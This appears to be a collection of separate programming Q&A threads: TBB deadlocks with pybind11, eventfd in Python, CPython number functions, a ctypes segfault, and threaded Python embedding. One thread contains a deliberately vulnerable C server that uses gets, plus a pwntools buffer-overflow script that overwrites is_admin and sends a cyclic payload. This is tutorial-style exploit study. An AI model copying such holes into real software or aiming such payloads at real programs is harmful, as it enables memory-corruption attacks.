Deadlock when combining Python with TBB

Here I would like to offer a complete test case showing a simple TBB parallel_for construct causing a deadlock in a Python application. The Python frontend is combined with a TBB backend using pybind11:
void backend_tbb(vector<int>& result, std::function<int (int)>& callback)
{
    int nthreads = tbb::task_scheduler_init::default_num_threads();
    const char* cnthreads = getenv("TBB_NUM_THREADS");
    if (cnthreads) nthreads = std::max(1, atoi(cnthreads));

    tbb::task_group group;
    tbb::task_arena arena(nthreads, 1);
    tbb::task_scheduler_init init(nthreads);

    group.run( [&] {
        tbb::parallel_for(tbb::blocked_range<int>(0, result.size()),
            [&](const tbb::blocked_range<int>& range)
            {
                for (int i = range.begin(); i != range.end(); i++)
                    result[i] = callback(i);
            });
    });
    arena.execute( [&] { group.wait(); });
}
void backend_serial(vector<int>& result, std::function<int (int)>& callback)
{
    for (int i = 0; i < result.size(); i++)
        result[i] = callback(i);
}
PYBIND11_MODULE(python_tbb, m)
{
    pybind11::bind_vector<std::vector<int> >(m, "stdvectorint");
    m.def("backend_tbb", &backend_tbb, "TBB backend");
    m.def("backend_serial", &backend_serial, "Serial backend");
}
With the backend_tbb call uncommented, the app hangs indefinitely:
from python_tbb import *
import numpy as np

def callback(a):
    return int(a) * 10

def main():
    length = 10
    result1 = stdvectorint(np.zeros(length, np.int32))
    result2 = stdvectorint(np.zeros(length, np.int32))
    backend_serial(result1, callback)
    # XXX Uncomment this to get the program to hang
    #backend_tbb(result2, callback)
    for i in range(length):
        print("%d vs %d" % (result1[i], result2[i]))

if __name__ == "__main__":
    main()
I've tried gil_scoped_acquire/gil_scoped_release, but no change. A similar solution reportedly works for an OpenMP loop, but again no luck when I try to do the same for TBB. Please advise on this case, thanks!

The issue is that the TBB tasks get spawned inside the task_arena instance associated with the task_group, but the waiting is done inside another task_arena instance, called arena. This can lead to a deadlock. To fix the issue, try wrapping the call to group.run() in arena.execute(), just as is done for group.wait().
However, in this case the latter wrapping seems superfluous, so you might want to combine the two wrappings into one:
arena.execute( [&] {
    group.run( /* ... */ );
    group.wait();
});
which, in this particular example, makes the use of task_group unnecessary, since the master thread spawns the tasks and immediately joins in to participate in their execution, just as tbb::parallel_for does. Thus, the task_group can simply be removed.

GDB failing with Pwntools on log: (gdb) Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... Remote connection closed

Bottom line up front, my problem:
I would expect gdb to be stopped at a SIGINT instead of what is happening. I believe the SIGINT is triggered, or at least that gets() has been called, because I don't seem to get this error until I reach that part of the code.
I've looked around for solutions, and already have tried:
sudo apt-get update --fix-missing
sudo apt-get source libc6
sudo apt-get install gdb-server
I am running on WSL / Kali
NAME="Kali GNU/Linux"
ID=kali
VERSION="2021.3"
VERSION_ID="2021.3"
VERSION_CODENAME="kali-rolling"
I'm roughly following a tutorial (although with a different target ELF) on exploiting a buffer overflow where source code is using gets.
I'm not asking for help with the exploitation, but rather with solving a problem automating Gdb through Pwntools.
The Rapid7 tutorial I'm following explains to use info frame, like:
(gdb) info frame
Stack level 0, frame at 0x7fffffffdde0:
rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip = 0x400701
called by frame at 0x7fffffffde30
source language c.
Arglist at 0x7fffffffddd0, args: sig=2
Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0
Saved registers:
rip at 0x7fffffffddd8
and then use the value of locals (0x7fffffffddd0 in the tutorial's case) with x/200x like:
x/200x 0x7fffffffddd0
...to inspect the relevant buffers.
The source for the program I'm exploiting is as follows. I added raise(SIGINT); after the gets call to stop and inspect the stack. The Python I wrote already drives the exploit to reach that SIGINT.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>

//gcc vuln.c -fno-stack-protector -no-pie -z execstack -o vuln

__attribute__((constructor)) void ignore_me(){
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
}

#define MAX_USERS 5

struct user {
    char username[16];
    char password[16];
};

void server() {
    int choice;
    char buf[0x10];
    struct user User[MAX_USERS];
    int num_users = 0;
    int is_admin = 0;
    char server_name[0x20] = "my_cool_server!";

    while(1) {
        puts("+=========:[ Menu ]:========+");
        puts("| [1] Create Account |");
        puts("| [2] View User List |");
        puts("| [3] Change Server Name |");
        puts("| [4] Log out |");
        puts("+===========================+");
        printf("\n > ");
        if (fgets(buf, sizeof(buf), stdin) == NULL) {
            exit(-1);
        }
        printf("is_admin: %d\n", is_admin);
        printf("num_users: %d\n", num_users);
        printf("buf size: %d\n", sizeof(buf));
        choice = atoi(buf);
        switch(choice) {
            case 1:
                if (num_users > 5)
                    puts("The server is at its user limit.");
                else {
                    printf("Enter the username:\n > ");
                    fgets(User[num_users].username, 15, stdin);
                    printf("Enter the password:\n > ");
                    fgets(User[num_users].password, 15, stdin);
                    puts("User successfully created!\n");
                    num_users++;
                }
                break;
            case 2:
                if (num_users == 0)
                    puts("There are no users on this server yet.\n");
                else {
                    for (int i = 0; i < num_users; i++) {
                        printf("%d: %s", i + 1, User[i].username);
                    }
                }
                break;
            case 3:
                if (!is_admin) {
                    puts("You do not have administrative rights. Please refrain from such actions.\n");
                    break;
                }
                else {
                    printf("The server name is stored at %p\n", server_name);
                    printf("Enter new server name.\n > ");
                    gets(server_name);
                    raise(SIGINT);
                    break;
                }
            case 4:
                puts("Goodbye!");
                return;
        }
    }
}

void main() {
    puts("Welcome to this awesome server!");
    puts("I hired a professional to make sure its security is top notch.");
    puts("Have fun!\n");
    server();
}
My python (note that the gdb.execute() commands are what I'm trying to automate):
import os
os.system('clear')

def print_stdout(p):
    out_list = p.read().decode("utf-8").split('\n')
    #for out in out_list:
    #    print(out)

from pwn import *
#context.log_level = 'error'

p = gdb.debug("./vuln", api=True)
p.gdb.execute('continue')
print_stdout(p)

# enter Create Account menu 4 times (overflows do not occur until the 4th iteration)
for i in range(0, 4):
    # The first 14+ bytes don't seem to matter
    free_padding = b'f' * 14
    # The second 14 bytes seem to require 0's
    # I wonder if this 14 + 1 number has something to do with the 15 bytes being read by username
    num_padding = b'0' * 14
    payload = free_padding + num_padding + b'1'
    #print(f"Payload: {payload}")
    # send buffer which will be interpreted as 1 by the menu selection logic
    p.sendline(payload)
    print_stdout(p)
    # At 29 non-zero bytes an overflow into is_admin appears.
    payload2 = b'1' * 29
    p.sendline(payload2)
    print_stdout(p)
    # The password may have potential to be involved in the overflow, but isn't necessary.
    payload3 = b'password'
    p.sendline(payload3)
    print_stdout(p)
    #print('----------------')

# Since is_admin is no longer zero, we can enter the Change Server Name interface.
#gdb.attach(p)
p.sendline(b'3')
print_stdout(p)
p.sendline(cyclic(100, n=8))

# here we should get a breakpoint and use:
# p.gdb.execute('info frame')
# then parse the locals address, assign it to locals_addr and use:
# p.gdb.execute(f"x/200x {locals_addr}")
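The parsing step sketched in those final comments could look something like this (a sketch: the regex assumes the `info frame` output format shown in the tutorial excerpt above, and `frame_info` stands in for the string that would come back from something like `p.gdb.execute('info frame', to_string=True)`):

```python
import re

# Hypothetical captured output of "info frame"; in the real script this
# string would come from the gdb API rather than being hard-coded.
frame_info = """Stack level 0, frame at 0x7fffffffdde0:
 rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip = 0x400701
 Arglist at 0x7fffffffddd0, args: sig=2
 Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0"""

# Pull the hex address after "Locals at" so it can be fed to x/200x.
match = re.search(r"Locals at (0x[0-9a-fA-F]+)", frame_info)
locals_addr = match.group(1)
print(locals_addr)  # -> 0x7fffffffddd0
```

With `locals_addr` extracted, the final `p.gdb.execute(f"x/200x {locals_addr}")` call from the comments can be issued unchanged.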
The error, as I stated in the comments, is triggered when I try this (and it doesn't seem to trigger until the SIGINT is reached, hence my inclusion of all the code):
(gdb) Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... Remote connection closed

os.eventfd_read does not set counter back to zero

I am using os.eventfd (new in Python 3.10) for IPC between a C process and a Python process. The Python process is run by fork-execv from C.
The eventfd and epoll are set up in C, and the eventfd file descriptor is passed to Python.
According to the Linux docs: "If EFD_SEMAPHORE was not specified and the eventfd counter has a nonzero value, then a read(2) returns 8 bytes containing that value, and the counter's value is reset to zero." So I would expect that a read would occur once, then not again, or subsequent reads should return 0 after the first read. But that's not what happens, it keeps returning the same value over and over again.
The C program sets up the eventfd and epoll:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/eventfd.h>
#include <sys/epoll.h>

int eventfd_initialize()
{
    int efd = eventfd(0, 0);
    return efd;
}

int epoll_initialize(int efd, int64_t * output_array)
{
    struct epoll_event ev;
    int epoll_fd = epoll_create1(0);
    if (epoll_fd == -1)
    {
        fprintf(stderr, "Failed to create epoll file descriptor\n");
        return 1;
    }
    ev.events = EPOLLIN; //May also need to be or'ed with EPOLLOUT
    ev.data.fd = efd;    //was 0
    if (epoll_ctl(epoll_fd, EPOLL_CTL_ADD, efd, &ev) == -1)
    {
        fprintf(stderr, "Failed to add file descriptor to epoll\n");
        close(epoll_fd);
        return 1;
    }
    output_array[0] = epoll_fd;
    output_array[1] = (int64_t)&ev;
    return 0;
}

ssize_t epoll_write(int epoll_fd, struct epoll_event * event_struc, int action_code)
{
    char ewbuf[8];
    sprintf(ewbuf, "%d", action_code);
    int maxevents = 1;
    int timeout = -1;
    write(epoll_fd, &ewbuf, 8);
    epoll_wait(epoll_fd, event_struc, maxevents, timeout);
    return 0;
}
The C program writes to the eventfd before the Python script is initialized, then the Python script is called with fork-exec. The Python script is a simple while True loop:
#!/usr/bin/python3
import sys
import os
from multiprocessing import shared_memory

event_fd = int(sys.argv[3])
os.set_blocking(event_fd, False)
existing_shm = shared_memory.SharedMemory(name='shm_object_0_0', create=False)

while True:
    print("Waiting in Python for event")
    v = os.eventfd_read(event_fd)
    print("found")
    print(v)
    if v != 99:
        print("release semaphore")
        os.eventfd_write(event_fd, v)
    if v == 99:
        print("finally")
        os.close(event_fd)
So I would expect it to read once, and then all subsequent reads to return zero until the C side writes more to the eventfd. But I get this continuous display:
Waiting in Python for event
found
13361
release semaphore
Waiting in Python for event
found
13361
release semaphore
Waiting in Python for event
found
13361
release semaphore
Waiting in Python for event
found
13361
release semaphore
With each new read it returns the same number, not 0. The docs say a read from the eventfd will set it back to zero. Adding time.sleep(1) to Python doesn't change the behavior.
Also, I don't see any way to call epoll_wait in the Python os docs.

How do I call global functions on Python objects?

I've seen this page: https://docs.python.org/3/c-api/object.html, but there doesn't seem to be any way to call functions like long_lshift or long_or.
It's not essential for me to call these exact functions; I could also live with the more generic versions, although I'd prefer these. Anyway, is there any way to use them? What do I need to include? Below is some example code (simplified) where I'd like to use them:
size_t parse_varint(parse_state* state) {
    int64_t value[2] = { 0, 0 };
    size_t parsed = parse_varint_impl(state, value);
    PyObject* low = PyLong_FromLong(value[0]);
    PyObject* high;
    if (value[1] > 0) {
        high = PyLong_FromLong(value[1]);
        PyObject* shift = PyLong_FromLong(64L);
        PyObject* high_shifted = long_lshift(high, shift);
        state->out = long_or(low, high_shifted);
    } else {
        state->out = low;
    }
    PyObject_Print(state->out, stdout, 0);
    return 0;
}
I couldn't find these functions in the documentation, but their public counterparts are exported in the Python.h header:
PyNumber_Lshift is the replacement for long_lshift in my code.
Similarly, PyNumber_Or is the replacement for long_or in my code.
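For reference, the pure-Python equivalent of that PyNumber_Lshift / PyNumber_Or composition, reassembling a 128-bit value from two 64-bit halves, is just:

```python
# Combine two 64-bit halves the way the C code does with
# PyNumber_Lshift and PyNumber_Or (the values here are arbitrary examples).
low = 0x0123456789ABCDEF
high = 0x1
value = (high << 64) | low
print(hex(value))  # -> 0x10123456789abcdef
```

PyNumber_Lshift and PyNumber_Or implement exactly the `<<` and `|` operators, so the C version produces the same arbitrary-precision integer.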

fgetc causes a segfault after running the second time

I have an application that tries to read a specific key file and this can happen multiple times during the program's lifespan. Here is the function for reading the file:
__status
_read_key_file(const char * file, char ** buffer)
{
    FILE * pFile = NULL;
    long fsize = 0;

    pFile = fopen(file, "rb");
    if (pFile == NULL) {
        _set_error("Could not open file: ", 1);
        return _ERROR;
    }

    // Get the filesize
    while (fgetc(pFile) != EOF) {
        ++fsize;
    }

    *buffer = (char *) malloc(sizeof(char) * (fsize + 1));

    // Read the file and write it to the buffer
    rewind(pFile);
    size_t result = fread(*buffer, sizeof(char), fsize, pFile);
    if (result != fsize) {
        _set_error("Reading error", 0);
        fclose(pFile);
        return _ERROR;
    }

    fclose(pFile);
    pFile = NULL;
    return _OK;
}
Now the problem is that a single open/read/close works just fine, but when I run the function a second time it always segfaults at this line: while(fgetc(pFile) != EOF)
Tracing with gdb shows that the segfault occurs deeper within the fgetc function itself.
I am a bit lost, but I am obviously doing something wrong, since if I try to get the size with fseek/ftell instead, I always get 0.
Some context:
Language: C
System: Linux (Ubuntu 16, 64-bit)
Please ignore functions and names with underscores, as they are defined somewhere else in the code.
The program is designed to run as a dynamic library loaded in Python via ctypes.
EDIT
Right, it seems there's more than meets the eye. Jean-François Fabre spawned an idea that I tested, and it worked; however, I am still confused as to why.
Some additional context:
Suppose there's a function in C that looks something like this:
_status
init(_conn_params cp) {
    _status status = _NONE;
    if (!cp.pkey_data) {
        _set_error("No data, open the file", 0);
        if (!cp.pkey_file) {
            _set_error("No public key set", 0);
            return _ERROR;
        }
        status = _read_key_file(cp.pkey_file, &cp.pkey_data);
        if (status != _OK) return status;
    }
    /* SOME ADDITIONAL WORK AND CHECKING DONE HERE */
    return status;
}
Now in Python (using 3.5 for testing), we generate those conn_params and then call the init function:
from ctypes import *

libCtest = CDLL('./lib/lib.so')

class _conn_params(Structure):
    _fields_ = [
        # Some params
        ('pkey_file', c_char_p),
        ('pkey_data', c_char_p),
        # Some additional params
    ]

#################### PART START #################
cp = _conn_params()
cp.pkey_file = "public_key.pem".encode('utf-8')

status = libCtest.init(cp)
status = libCtest.init(cp)  # Will cause a segfault
##################### PART END ###################

# However if we do
#################### PART START #################
cp = _conn_params()
cp.pkey_file = "public_key.pem".encode('utf-8')
status = libCtest.init(cp)

# And then
cp = _conn_params()
cp.pkey_file = "public_key.pem".encode('utf-8')
status = libCtest.init(cp)
##################### PART END ###################
The second PART START / PART END block will not cause the segfault in this context.
Would anyone know the reason why?

How to use multi-threading with two C++ functions embedding Python?

I am learning how to embed Python in C++ code. I am having trouble using multi-threading to parallelize two C++ functions that embed Python.
My sample codes are shown below:
thread_test.py
import time

def test1():
    time.sleep(5)   # delays for 5 seconds
    print 1935
    return 'happy'

def test2():
    time.sleep(10)  # delays for 10 seconds
    print 3000
py_thread.h
string test_func1(string file_dir){
    string result_dir;
    string str = "import sys; sys.path.insert(0," "\'" + file_dir + "\'" + ")";
    const char * c = str.c_str();
    PyRun_SimpleString(c);

    PyObject *pModule, *pFunc, *pName, *presult, *pArgs;
    pName = PyString_FromString("thread_test");
    pModule = PyImport_Import(pName);
    Py_DECREF(pName);

    pFunc = PyObject_GetAttrString(pModule, "test1");
    if (pFunc != NULL) {
        presult = PyObject_CallObject(pFunc, NULL);
        result_dir = PyString_AsString(presult);
    }
    else {
        printf("pFunc returned NULL\n");
    }
    Py_DECREF(pModule);
    Py_DECREF(pFunc);
    return result_dir;
}

void test_func2(string file_dir){
    // Almost the same as test_func1, except "test1" is replaced with "test2"
    // and there is no result_dir return value.
}
In main, if I don't use multi-threading and just run the two functions and other normal C++ functions in series, it works. But if I use a C++ threading technique such as OpenMP, I get a SEGMENTATION FAULT. (Code is shown below.)
main.cpp
int main(){
    Py_Initialize();
    #pragma omp parallel num_threads(2)
    {
        int i = omp_get_thread_num();
        if (i == 0)
        {
            test_func1("../");
        }
        if (i == 1 || omp_get_num_threads() != 2)
        {
            ANOTHER_C++_ONLY_SIMPLE_FUNCTION();
            test_func2("../");
        }
    }
    Py_Finalize();
    return 0;
}
I have also tried std::thread in C++11 and pthreads; they all give me a segmentation fault. So how can I parallelize the two functions?
Thank you!
